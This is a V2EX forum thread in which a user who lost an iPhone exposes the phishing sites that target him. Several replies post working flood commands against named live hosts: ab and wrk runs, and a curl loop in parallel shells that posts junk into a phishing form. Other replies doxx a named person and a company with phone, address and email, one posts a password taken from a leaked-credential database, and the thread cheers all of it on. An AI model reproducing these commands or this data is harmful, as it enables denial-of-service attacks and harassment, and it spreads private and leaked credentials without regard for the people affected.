V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
XueRainey
V2EX  ›  互联网

MMP 的钓鱼网站

  •  
  •   XueRainey · 2017-08-02 12:19:13 +08:00 · 9265 次点击
    这是一个创建于 2697 天前的主题,其中的信息可能已经有所发展或是发生改变。

    最近丢了一部 iphone 7p

    然后持续性收到一个短信

    http://s.weituibao.com/static/1501647320437/8DDF67734DCCC084C1AD490596C4C50E.png

    然后我查了这个网站的所有者信息

    http://s.weituibao.com/static/1501647320437/2B637666-0BEA-4043-ABEB-AF76D2B3C7DA.png

    然后这个渣站还有这样一段故事。 http://s.weituibao.com/static/1501647320437/26641A03-8A8B-4EF6-8F2B-8C4465B32DEF.png

    接着就直接爆站吧,我先爆为敬。

    惹到程序员算你点背,在此发帖,主要为了曝光这个网站和这个所有者信息,不打码。

    第 1 条附言  ·  2017-08-02 12:58:38 +08:00
    在站长之家反查了他的网站,发现这人拥有 n 多域名,其中有很多钓鱼网站,遂写脚本同爆之


    附站长之家反查地址: http://whois.chinaz.com/reverse?host=%E6%9E%97%E8%BF%9B%E6%A0%87&ddlSearchMode=2&page=4
    93 条回复    2017-12-26 12:07:26 +08:00
    torbrowserbridge
        1
    torbrowserbridge  
       2017-08-02 12:21:05 +08:00 via Android
    干得漂亮
    zjsxwc
        2
    zjsxwc  
       2017-08-02 12:31:36 +08:00
    围观
    kurisu
        3
    kurisu  
       2017-08-02 12:33:04 +08:00
    围观
    hcql
        4
    hcql  
       2017-08-02 12:37:34 +08:00
    举报之。
    Clarke
        5
    Clarke  
       2017-08-02 12:38:02 +08:00 via Android
    appiephone.
    kaiji
        6
    kaiji  
       2017-08-02 12:38:25 +08:00
    前几个月我也收到一条,为什么他们会知道你掉了手机?
    ErnestChan
        7
    ErnestChan  
       2017-08-02 12:44:51 +08:00
    个人所得税,哈哈。虽然楼主丢了手机,但是看到这段还是想笑。对不起。
    lucifer9
        8
    lucifer9  
       2017-08-02 12:46:26 +08:00
    @kaiji 丢手机肯定连着 SIM 卡一起丢。SIM 卡没 PIN 码的话放别的手机里面怎么都能知道号码。
    rocksolid
        9
    rocksolid  
       2017-08-02 12:49:08 +08:00
    大快人心,这种骗子
    ahualotus
        10
    ahualotus  
       2017-08-02 12:50:35 +08:00
    火钳刘明
    ic2y
        11
    ic2y  
       2017-08-02 13:04:40 +08:00
    卡巴斯基这么吊,我访问的时候,直接拦截了。。告诉我这是 钓鱼网站。。
    qq292382270
        12
    qq292382270  
       2017-08-02 13:07:17 +08:00
    嗯.. 当他不能访问的时候.. 楼下的朋友可以帮忙 @我一下么..哈哈.. 想围观
    Manchester
        13
    Manchester  
       2017-08-02 13:08:21 +08:00
    有效信息都这么多了,能破案不?
    ixinshang
        14
    ixinshang  
       2017-08-02 13:09:55 +08:00 via Android
    脚本可有 我这边一起爆
    XueRainey
        15
    XueRainey  
    OP
       2017-08-02 13:14:02 +08:00   ❤️ 1
    @ixinshang 刚开始我也是用脚本,后来朋友提醒,使用 ab 压测工具,分分钟爆站。
    gayhub
        16
    gayhub  
       2017-08-02 13:25:59 +08:00
    爆破菊发来贺电!
    agostop
        17
    agostop  
       2017-08-02 13:34:58 +08:00
    没人来把后台管理帐号和密码搞出来吗?
    lisonfan
        18
    lisonfan  
       2017-08-02 13:48:20 +08:00
    ![]( )
    maplesog
        19
    maplesog  
       2017-08-02 13:50:11 +08:00
    爆站脚本贴出来
    WindsonYan
        20
    WindsonYan  
       2017-08-02 13:55:15 +08:00
    发短信到 12110 或者 12321 报案啊,钓鱼网站显然是属于网络诈骗的。。。
    showgood163
        21
    showgood163  
       2017-08-02 14:28:49 +08:00 via Android
    求爆破思路
    cibe
        22
    cibe  
       2017-08-02 14:41:10 +08:00
    林进标??
    报警这狗杂种吧。。。。。。
    king2014
        23
    king2014  
       2017-08-02 14:59:45 +08:00
    教教我怎么爆破?
    neoFelhz
        24
    neoFelhz  
       2017-08-02 15:03:46 +08:00 via Android
    名字都有了,WHOIS 又没有保护,这么多信息,把他出道了算了。
    Cavolo
        25
    Cavolo  
       2017-08-02 15:05:43 +08:00 via iPhone
    @WindsonYan 兄弟你以为我们之前会不试吗,就是因为监管不作为才只能自己动手,我举报的这类网站没一个会处理
    timothyye
        26
    timothyye  
       2017-08-02 15:09:09 +08:00
    lz 这个命令行的 whois 工具,分享下……
    ixiaohei
        27
    ixiaohei  
       2017-08-02 15:11:20 +08:00
    啊,我要用的 vps ab 压测试试
    GeekJason
        28
    GeekJason  
       2017-08-02 15:15:10 +08:00
    大快人心。
    顺便补充一下:小偷偷到手机解不开锁,一般低价转手给专门回收有 ID 锁机器的二手贩子,二手贩子再找这些钓鱼网站来调取密码,解锁后按二手机贩卖。这个林进标应该只是整个链条的一环,如果报警抓到,说不定能顺藤摸瓜带出一堆人。
    ixiaohei
        29
    ixiaohei  
       2017-08-02 15:15:55 +08:00
    @timothyye mac 自带
    timothyye
        30
    timothyye  
       2017-08-02 15:16:15 +08:00   ❤️ 2
    直接 ab 压测了一下 www.appeiphone.cn 页面就出错了,看来还是 ASP.NET 的干活






    压测命令:ab -n 10000 -c 100 http://www.appeiphone.cn/
    timothyye
        31
    timothyye  
       2017-08-02 15:17:39 +08:00
    @ixiaohei 之前一直没发现……
    ranleng
        32
    ranleng  
       2017-08-02 15:26:35 +08:00
    已经被玩坏了..... 还想进去看看呢.
    smilenceX
        33
    smilenceX  
       2017-08-02 15:27:27 +08:00
    来晚了,你们都不让我玩一会儿 (手动滑稽
    smilenceX
        34
    smilenceX  
       2017-08-02 15:28:59 +08:00
    XueRainey
        35
    XueRainey  
    OP
       2017-08-02 15:30:13 +08:00
    @ranleng
    @smilenceX

    http://whois.chinaz.com/reverse?host=%E6%9E%97%E8%BF%9B%E6%A0%87&ddlSearchMode=2&page=4

    里面的网站都是他名下的,很大一部分是钓鱼网站,你们可以去玩玩
    XueRainey
        36
    XueRainey  
    OP
       2017-08-02 15:31:04 +08:00   ❤️ 1
    @timothyye 这个命令很好用,我是看电影学来的,(手动滑稽。。
    buir
        37
    buir  
       2017-08-02 15:32:46 +08:00
    这个站已经死求了 !
    nauynah
        38
    nauynah  
       2017-08-02 15:49:11 +08:00   ❤️ 1
    ab -n 1000 -c 1000 -p post.txt -T 'application/x-www-form-urlencoded' http://www.app-im.cn/save.asp

    post.txt 内容是 u=123456&p=12345&x=4&y=10
    artoostark
        39
    artoostark  
       2017-08-02 16:01:47 +08:00
    给一条信息,其中一个 QQ 找出来的,关于黑客工具的

    诚招代理 dipush 找 Q317019525

    ?from=s1.8-1-1.2
    artoostark
        40
    artoostark  
       2017-08-02 16:08:04 +08:00
    接我刚才发的,在视频里看到一个邮箱 [email protected]
    conglovely
        41
    conglovely  
       2017-08-02 16:15:00 +08:00
    我刚试了又能打开了,求爆破思路和工具。
    timothyye
        42
    timothyye  
       2017-08-02 16:15:16 +08:00
    用这家伙的名字和邮箱,搜不出来太多信息
    artoostark
        43
    artoostark  
       2017-08-02 16:21:06 +08:00
    artoostark
        44
    artoostark  
       2017-08-02 16:22:51 +08:00
    天眼查的信息 https://www.tianyancha.com/company/2317597321

    安阳弘网科技有限公司
    电话:13343680205 邮箱: [email protected]
    网址:www.pngx.com 地址: 安阳市北关区平原路与安漳大道交叉口西南角桂花苑小区 3 号楼 1 单元 301 室
    ELLIA
        45
    ELLIA  
       2017-08-02 16:28:46 +08:00
    干得漂亮!不过好像差不出来太多内容,这种东西举报也没什么效果,换个网址照样继续干
    TimCheng
        46
    TimCheng  
       2017-08-02 16:28:59 +08:00
    强势围观!
    Jasmine2016
        47
    Jasmine2016  
       2017-08-02 16:32:13 +08:00
    @artoostark #44 给力!
    Microi
        48
    Microi  
       2017-08-02 16:37:56 +08:00
    厉害厉害。
    F0nebula
        49
    F0nebula  
       2017-08-02 16:43:47 +08:00   ❤️ 2
    @nauynah #38 可以用 [进程替换( Process Substitution )]
    ab -n 1000 -c 1000 -p <(echo 'u=123456&p=12345&x=4&y=10') -T 'application/x-www-form-urlencoded' http://www.app-im.cn/save.asp
    snoopygao
        50
    snoopygao  
       2017-08-02 16:50:30 +08:00 via iPhone
    围观
    artoostark
        51
    artoostark  
       2017-08-02 16:50:38 +08:00
    fxkkaka
        52
    fxkkaka  
       2017-08-02 16:52:42 +08:00
    我就看看
    bios12567496
        53
    bios12567496  
       2017-08-02 16:58:29 +08:00
    666 膜拜大佬
    yaoxuwang
        54
    yaoxuwang  
       2017-08-02 17:04:29 +08:00 via iPhone
    支持
    Qcui
        55
    Qcui  
       2017-08-02 17:11:28 +08:00
    你把所有的证据都帮他们找出来,摆在他们面前,看他们会不会管?(我赌 5 毛基本不会)
    ss0xt
        56
    ss0xt  
       2017-08-02 17:28:26 +08:00
    怎么举报这种诈骗的
    Norie
        57
    Norie  
       2017-08-02 17:33:26 +08:00
    这个公司注册了好多域名,把我想注册的给注册了
    smithtel
        58
    smithtel  
       2017-08-02 17:38:17 +08:00 via iPhone
    报警更大的可能是没人管,早就对赵家狗失望了
    AlwaysBehave
        59
    AlwaysBehave  
       2017-08-02 17:48:24 +08:00
    @conglovely 最简单的,从 chrome 提取一下提交信息
    先 F12 进 Network,填好信息提交的时候按 esc,看到有一条 cancel 的记录,右键复制 copy->copy as cURL
    curl 可以直接干,脚本最简单就是

    for((i=0;i<20;++i));do while :;do

    {{Curl command goes here}}

    done;

    玩的开心)
    buyiban540
        60
    buyiban540  
       2017-08-02 19:56:44 +08:00 via Android
    我也遇到了,我手机丢的时候。钓鱼我,和你情况一样
    buyiban540
        61
    buyiban540  
       2017-08-02 19:57:48 +08:00 via Android
     Apple 安全服务中心

    用户您好:您的 iPhone 设备正在在官网申请解锁,如果不是本人申请解锁,请立即登录 www.appid.idzte.com 选择右上角“拒绝激活”如果没有操作选项“拒绝激活”系统在 24 小时内默认激活设备,请忽略此信息.
    [Find My iPhone]
    buyiban540
        62
    buyiban540  
       2017-08-02 19:58:27 +08:00 via Android
     Apple 授权服务中心

    尊敬的用户,您好:
    您开启丢失模式的 iPhone 设备正在苹果服务中心申请解锁及换新业务。如果非本人操作,请立即前往 www.appleid.idtal.com 进行拦截并验证您的个人信息,如果验证通过我们将暂扣该设备,并及时通知您领回遗失的设备。如果是您本人操作,请忽略此条短信。

    此致

    Apple 支持
    1and0
        63
    1and0  
       2017-08-02 20:06:08 +08:00
    这网站还能玩啊..
    voocel
        64
    voocel  
       2017-08-02 20:07:07 +08:00 via Android
    支持
    atlantis
        65
    atlantis  
       2017-08-02 20:55:41 +08:00
    虽说解气,不过大多时候手机还是拿不回来
    Loyalsoldier
        66
    Loyalsoldier  
       2017-08-02 21:09:10 +08:00
    歇歇吧各位,把网站搞掉可以。名字肯定不是作恶者本人……
    shansing
        67
    shansing  
       2017-08-02 22:02:55 +08:00
    哇,还是 .cn 域名。
    wslsq
        68
    wslsq  
       2017-08-03 00:30:20 +08:00
    我同意 66 楼的观点。。
    yu1u
        69
    yu1u  
       2017-08-03 07:58:40 +08:00 via iPhone
    信息不一定是本人的,核实下外面误伤
    lydasia
        70
    lydasia  
       2017-08-03 08:40:42 +08:00
    反查了下,统统在 12321.cn 举报了。
    HGladIator
        71
    HGladIator  
       2017-08-03 09:01:20 +08:00 via iPhone
    @yu1u 说的对,人不会傻成这样吧
    manihome
        72
    manihome  
       2017-08-03 09:44:29 +08:00
    公司注册备案的 可以发律涵 A 一笔然后让其关闭。
    luw2007
        73
    luw2007  
       2017-08-03 09:48:07 +08:00
    wrk -c 1000 -d 60s -t 5 http://www.app-im.cn/
    ifconfig
        74
    ifconfig  
       2017-08-03 10:27:23 +08:00


    然后我在社工库查到了他的密码
    ID2333
        75
    ID2333  
       2017-08-03 10:45:29 +08:00
    强势围观、、先评再看。
    XueRainey
        76
    XueRainey  
    OP
       2017-08-03 10:48:36 +08:00
    @ifconfig
    @artoostark

    很精彩的操作。
    rswl
        77
    rswl  
       2017-08-03 11:07:47 +08:00
    学一下操作
    catsoul
        78
    catsoul  
       2017-08-03 11:23:51 +08:00
    支持,干死他狗 X 的钓鱼骗子
    Otho
        79
    Otho  
       2017-08-03 11:58:01 +08:00
    干的漂亮,进来学习经验了
    cw35
        80
    cw35  
       2017-08-03 12:13:17 +08:00
    干得漂亮,不管赵家管不管,至少先把他拉上街示众的。
    ahkxhyl
        81
    ahkxhyl  
       2017-08-03 12:27:39 +08:00
    @ifconfig 他的密码我有完整的 但是改过
    AnonymousAccout
        82
    AnonymousAccout  
       2017-08-03 12:31:38 +08:00 via iPhone
    厉害了
    ahkxhyl
        83
    ahkxhyl  
       2017-08-03 12:34:23 +08:00
    [email protected] 6882159 现在不正确了
    freestyleyooo
        84
    freestyleyooo  
       2017-08-03 12:37:06 +08:00
    @timothyye 请问 ab 这个命令在哪安装呢,win10 没这个命令啊
    F0nebula
        85
    F0nebula  
       2017-08-03 13:16:20 +08:00
    @freestyleyooo #84 是 Apache 自带的
    F0nebula
        86
    F0nebula  
       2017-08-03 13:20:43 +08:00
    @F0nebula #49
    @nauynah @ossicee
    那个 还可以用
    <(<<<'u=123456&p=12345&x=4&y=10')
    ref: http://ahei.info/bash.htm#sec-3
    timothyye
        87
    timothyye  
       2017-08-03 16:30:58 +08:00
    @freestyleyooo apt-get install apache2-utils

    win10 估计没有,linux 下可以这么装
    mubai
        88
    mubai  
       2017-08-03 17:35:42 +08:00
    看了这个帖子。。学习了
    artoostark
        89
    artoostark  
       2017-08-03 22:13:08 +08:00
    @XueRainey 还好吧,一般般,皮毛都学的不是很好。以前实际实践过社会工程学,算是有点经验。
    yanghong502
        90
    yanghong502  
       2017-08-03 23:25:11 +08:00
    @ifconfig 请问你还有没有可以访问的 QQ 群社工库,我之前用的几个好像都关站了,翻墙也上不去。
    Nick930826
        91
    Nick930826  
       2017-08-04 09:44:13 +08:00
    我就是林进标,你个龟儿子,又爆我站
    ifconfig
        92
    ifconfig  
       2017-08-04 16:24:53 +08:00
    @yanghong502 我就是这个站的站长,但是没有 qq 群社工库哦
    brick713
        93
    brick713  
       2017-12-26 12:07:26 +08:00
    @ifconfig #92 不知道你的站的架构是什么样的?感觉你的站可能会被查水表关了,想自己搭一个自己用呢?能联系下么?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5357 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 30ms · UTC 07:47 · PVG 15:47 · LAX 23:47 · JFK 02:47
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.